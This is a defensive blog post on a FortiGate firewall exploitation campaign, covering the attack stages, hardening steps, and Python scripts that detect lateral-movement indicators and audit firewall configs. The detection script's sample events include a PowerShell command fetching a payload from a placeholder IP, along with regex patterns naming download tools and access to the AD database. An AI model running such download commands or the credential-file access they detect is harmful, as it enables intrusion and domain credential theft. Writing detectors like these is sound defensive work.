FortiGate Devices Exploited to Breach Networks: Why Your Firewall May Be Your Weakest Link
3/10/2026
Steve


When SentinelOne researchers disclosed that threat actors are actively exploiting FortiGate Next-Generation Firewall (NGFW) appliances to breach networks and steal service account credentials, it sent a clear warning to organizations everywhere: the devices you deployed to protect your network may be your weakest link. Healthcare providers, government agencies, and managed service providers (MSPs) are in the crosshairs, and the attack playbook is both sophisticated and alarmingly effective.

This is not a theoretical vulnerability. Attackers are actively exploiting CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858—or simply using weak credentials and misconfigurations—to gain initial access. Once inside, they are extracting configuration files, decrypting service account credentials, and using that access to authenticate to Active Directory, enroll rogue workstations, and move laterally across victim environments.

If your organization relies on FortiGate appliances, or any NGFW with Active Directory integration, this is the moment to audit configurations, rotate credentials, and harden access controls.

The Attack Playbook: From Firewall to Domain Compromise

The SentinelOne investigation reveals a multi-stage attack that begins with network appliance compromise and ends with Active Directory authentication and credential harvesting.

Stage 1: Initial Access

Attackers gain entry to FortiGate appliances through one of three paths:

  • Exploitation of known vulnerabilities (CVE-2025-59718, CVE-2025-59719, CVE-2026-24858)
  • Compromise of weak administrative credentials
  • Exploitation of misconfigurations that expose management interfaces

Once inside, the threat actors create persistence. In one documented case from November 2025, attackers created a new local administrator account named "support" and configured four firewall policies allowing unrestricted traversal across all network zones.

Stage 2: Credential Harvesting

The primary objective is extracting configuration files that contain encrypted service account credentials. FortiGate appliances integrated with Active Directory and LDAP often store these credentials to enable role-based policy enforcement and network security alert correlation.

In the February 2026 phase of the attack, threat actors:

  • Extracted configuration files containing LDAP credentials for the fortidcagent service account
  • Decrypted the credentials
  • Authenticated to Active Directory using those clear-text credentials
  • Enrolled rogue workstations in the domain

Stage 3: Lateral Movement and Exfiltration

With domain access established, attackers initiated network scanning—triggering detection in at least one case. However, in a separate January 2026 incident, attackers moved faster:

  • Deployed remote access tools (Pulseway, MeshAgent)
  • Downloaded Java malware via PowerShell from AWS infrastructure
  • Used DLL side-loading to execute the malware
  • Exfiltrated the NTDS.dit file (Active Directory database) and SYSTEM registry hive to an external server over port 443

The NTDS.dit file contains every user, computer, and group object in the domain, including the password hashes for every account. Combined with the boot key held in the SYSTEM registry hive, those hashes can be decrypted and cracked offline, which is why the two files are taken together—essentially a complete credential database for the domain.

Why NGFW Appliances Are High-Value Targets

The appeal of network appliances to threat actors is straightforward: they sit at the network perimeter, they have privileged access to internal systems, and they are often overlooked in security hardening efforts.

"FortiGate network appliances have considerable access to the environments they were installed to protect," SentinelOne researchers noted. "In many configurations, this includes service accounts which are connected to the authentication infrastructure, such as Active Directory and LDAP."

This access enables appliances to:

  • Map roles to users by correlating connection attributes with directory information
  • Enforce role-based network security policies
  • Accelerate response to network security alerts

But that same integration creates a dangerous attack surface. Compromise the appliance, and you compromise the directory services that underpin the entire organization.

Initial Access Brokers (IABs) understand this value proposition. They breach networks, establish persistence, and sell that access to ransomware operators, espionage groups, and other criminal actors. The FortiGate campaign fits this pattern exactly: attackers maintained periodic checks on device accessibility for months, consistent with an IAB establishing a foothold for resale.

Actionable Steps: Hardening Your NGFW Infrastructure

If you manage FortiGate appliances—or any NGFW with AD/LDAP integration—take these steps immediately.

1. Patch Vulnerabilities

Apply patches for CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858. These are known exploitation vectors. If your appliances cannot be updated immediately, isolate management interfaces from the internet and restrict access to trusted IP ranges.

2. Audit Service Account Credentials

Review every service account referenced in your NGFW configuration:

  • Rotate passwords immediately
  • Use managed service accounts or group managed service accounts (gMSA) where possible
  • Limit delegation rights to the minimum required for the appliance function
  • Disable any service accounts that are no longer in use

3. Review Administrative Accounts

Check for unauthorized administrator accounts—especially any named "support" or similar generic terms. In the documented attack, the threat actor created exactly such an account to maintain persistence.

4. Restrict Management Interfaces

Management interfaces should not be exposed to the internet. Restrict access to:

  • Dedicated management VLANs
  • Trusted administrative subnets
  • Jump boxes or bastion hosts with multi-factor authentication

5. Monitor for Lateral Movement Indicators

Deploy endpoint detection and response (EDR) tools and monitor for:

  • Unusual workstation enrollment in Active Directory
  • PowerShell downloading and executing remote payloads
  • Outbound connections to unknown IPs on port 443
  • Access to NTDS.dit or SYSTEM registry hive files
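The four indicators above can be turned into concrete detection rules. The following is an added example written for this article, not code from SentinelOne or Fortinet: it runs a small set of rules over constructed, normalised events in the shape an EDR or SIEM pipeline might emit. The field names (`subject`, `image`, `cmdline`, `dst_ip`, `object`), the allowlists (`PROVISIONING_ACCOUNTS`, `KNOWN_EGRESS_IPS`) and the sample hostnames and addresses are this example's assumptions; the event numbers follow Windows Security (4741 computer account created, 4688 process created, 4663 object access) and Sysmon (3 network connection).

```python
import re

# Constructed sample events (not real telemetry). The ordering interleaves
# one suspicious and one benign event for each of the four indicators.
SAMPLE_EVENTS = [
    # 4741: computer account created in AD; the subject is the creating account
    {"id": 4741, "host": "DC01", "subject": "svc-ldap-fw", "new_computer": "DESKTOP-7Q2K1A$"},
    {"id": 4741, "host": "DC01", "subject": "svc-sccm-join", "new_computer": "WS-FIN-042$"},
    # 4688: process creation with command line
    {"id": 4688, "host": "WS-FIN-017",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -c "iwr https://203.0.113.10/app.zip -OutFile C:\\Users\\Public\\app.zip"'},
    {"id": 4688, "host": "WS-FIN-017",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Service"},
    # Sysmon 3: outbound network connection
    {"id": 3, "host": "WS-FIN-017", "image": r"C:\Users\Public\app\javaw.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
    {"id": 3, "host": "WS-FIN-017", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "198.51.100.7", "dst_port": 443},
    # 4663: object access on the domain controller
    {"id": 4663, "host": "DC01", "subject": "svc-ldap-fw", "object": r"C:\Windows\NTDS\ntds.dit"},
    {"id": 4663, "host": "DC01", "subject": "NT AUTHORITY\\SYSTEM",
     "object": r"C:\Windows\System32\config\SYSTEM"},
]

# Assumed allowlists: accounts that are allowed to join machines, and
# destinations already known to the organisation. Maintain these from
# your own inventory; the values here are constructed.
PROVISIONING_ACCOUNTS = {"svc-sccm-join"}
KNOWN_EGRESS_IPS = {"198.51.100.7"}

# Command-line cues for PowerShell fetching remote content.
DOWNLOAD_CUE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# The AD database and the hive holding the key needed to decrypt it.
AD_SECRETS = re.compile(r"ntds\.dit|\\config\\SYSTEM$", re.IGNORECASE)


def check_event(ev):
    """Return the name of the indicator an event matches, or None."""
    eid = ev["id"]
    # A machine join by an account that is not a provisioning account.
    if eid == 4741 and ev["subject"] not in PROVISIONING_ACCOUNTS:
        return "rogue-workstation-enrollment"
    # PowerShell invoked with a download cue on its command line.
    if eid == 4688 and ev["image"].lower().endswith("powershell.exe") \
            and DOWNLOAD_CUE.search(ev["cmdline"]):
        return "powershell-remote-download"
    # Port 443 egress to a destination not in the known list.
    if eid == 3 and ev["dst_port"] == 443 and ev["dst_ip"] not in KNOWN_EGRESS_IPS:
        return "unknown-443-egress"
    # NTDS.dit or the SYSTEM hive touched by something other than the OS itself.
    # Legitimate backup jobs will need their own allowlisting here.
    if eid == 4663 and AD_SECRETS.search(ev["object"]) \
            and ev["subject"] != "NT AUTHORITY\\SYSTEM":
        return "ad-secrets-access"
    return None


def detect(events):
    """Run every event through the rules; return (indicator, host, actor) hits."""
    hits = []
    for ev in events:
        name = check_event(ev)
        if name:
            hits.append((name, ev["host"], ev.get("subject") or ev.get("image")))
    return hits


if __name__ == "__main__":
    for name, host, actor in detect(SAMPLE_EVENTS):
        print(f"{name:32} host={host} actor={actor}")
```

Each rule alone is noisy; the value is in correlation. A machine join performed by the same account that an appliance uses for LDAP lookups, followed within minutes by PowerShell downloads and new port 443 egress from the joined host, is the sequence this article describes and should page someone even if each event on its own would only be logged.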

6. Segment Network Zones

The attack exploited firewall policies that allowed unrestricted zone traversal. Review your firewall rules and enforce least-privilege principles:

  • Deny by default
  • Explicitly permit required traffic flows
  • Log and alert on denied attempts
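Steps 3 and 6 are both checks against the appliance's configuration, and both can be automated against a CLI export. The script below is an added example for this article, not Fortinet tooling or SentinelOne's code. It assumes the familiar `config <section> / edit <id> / set <key> <values> / next / end` layout of a FortiGate export, a constructed sample configuration, and an organisation-maintained list of approved administrator logins (`APPROVED_ADMINS`); nested sub-blocks are skipped rather than modelled. It flags administrator accounts that are not on the approved list or have no `trusthost` source restriction, and accept policies that cross `any` interface, allow all sources, destinations and services, or have traffic logging disabled.

```python
import shlex

# Constructed FortiGate-style export (not a real device configuration).
# Policy 1 is a tight, logged rule; policy 2 is the kind of any-to-any
# rule the article describes; "support" is an unexpected admin login.
SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set accprofile "super_admin"
        set trusthost1 10.10.0.0 255.255.255.0
    next
    edit "support"
        set accprofile "super_admin"
    next
end
config firewall policy
    edit 1
        set name "lan-to-dmz-web"
        set srcintf "lan"
        set dstintf "dmz"
        set srcaddr "lan-net"
        set dstaddr "dmz-web"
        set action accept
        set service "HTTPS"
        set logtraffic all
    next
    edit 2
        set name "tmp"
        set srcintf "any"
        set dstintf "any"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set service "ALL"
        set logtraffic disable
    next
end
"""

# Assumption: the organisation's documented administrator logins.
APPROVED_ADMINS = {"admin"}


def parse_config(text):
    """Parse top-level sections into {section: {entry_id: {key: [values]}}}.
    Nested 'config' blocks inside an entry are skipped by tracking depth."""
    sections, section, entry, depth = {}, None, None, 0
    for raw in text.splitlines():
        tokens = shlex.split(raw)
        if not tokens:
            continue
        kw = tokens[0]
        if depth:                      # inside a nested block we do not model
            depth += kw == "config"
            depth -= kw == "end"
            continue
        if kw == "config":
            if section is None:
                section = " ".join(tokens[1:])
                sections.setdefault(section, {})
            else:
                depth = 1
        elif kw == "edit" and section is not None:
            entry = sections[section].setdefault(tokens[1], {})
        elif kw == "set" and entry is not None:
            entry[tokens[1]] = tokens[2:]
        elif kw == "next":
            entry = None
        elif kw == "end":
            section, entry = None, None
    return sections


def audit_admins(sections, approved=APPROVED_ADMINS):
    """Step 3: unexpected logins and logins with no trusthost restriction."""
    findings = []
    for name, attrs in sections.get("system admin", {}).items():
        if name not in approved:
            findings.append(f"admin '{name}': not in approved list")
        if not any(k.startswith("trusthost") for k in attrs):
            findings.append(f"admin '{name}': no trusthost restriction")
    return findings


def audit_policies(sections):
    """Step 6: accept rules that defeat zone segmentation or are unlogged."""
    findings = []
    for pid, attrs in sections.get("firewall policy", {}).items():
        val = lambda k: " ".join(attrs.get(k, [])).lower()
        if val("action") != "accept":
            continue
        reasons = []
        if val("srcintf") == "any" or val("dstintf") == "any":
            reasons.append("crosses any zone")
        if val("srcaddr") == "all" and val("dstaddr") == "all" and val("service") == "all":
            reasons.append("all sources, destinations and services")
        if val("logtraffic") == "disable":
            reasons.append("traffic logging off")
        if reasons:
            findings.append(f"policy {pid} ('{val('name')}'): " + "; ".join(reasons))
    return findings


def audit_config(text):
    sections = parse_config(text)
    return {"admins": audit_admins(sections), "policies": audit_policies(sections)}


if __name__ == "__main__":
    for kind, items in audit_config(SAMPLE_CONFIG).items():
        for item in items:
            print(f"[{kind}] {item}")
```

Run this against a fresh export after every change window and diff the findings against the previous run; a new administrator login or a new any-to-any accept rule appearing between runs is exactly the persistence step described in the November 2025 case.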

7. Document and Test Incident Response

If you detect signs of compromise—unexpected admin accounts, configuration file access, rogue workstation enrollments—have a playbook ready:

  • Isolate the appliance
  • Disable associated service accounts
  • Capture forensic images of configuration and logs
  • Engage incident response support if needed

The Bigger Picture: Appliances as Attack Surface

This campaign underscores a broader security truth: every integrated system is an attack surface. Organizations that deploy NGFW appliances with Active Directory integration are extending trust to devices that sit at the network edge, often with internet-facing management interfaces.

The FortiGate exploitation campaign is not an isolated incident. It is part of a pattern where threat actors target:

  • VPN appliances (Pulse Secure, Ivanti, Fortinet)
  • Email security gateways
  • Unified threat management (UTM) devices
  • Any system with privileged directory access

"NGFW appliances have become ubiquitous because they provide strong network monitoring capabilities," SentinelOne noted. "However, these devices are high-value targets for actors with a variety of motivations and skill levels, from state-aligned actors conducting espionage to financially motivated attacks such as ransomware."

Conclusion

The FortiGate exploitation campaign is a reminder that security devices themselves require security hardening. The appliances you deployed to protect your network may have privileged access to your directory services—and threat actors are actively exploiting that trust.

Patch your appliances. Rotate service account credentials. Restrict management interfaces. Monitor for lateral movement. And treat every integrated system as a potential entry point that requires the same rigor you apply to endpoints and servers.

Your firewall may be your first line of defense. Make sure it is not also your weakest link.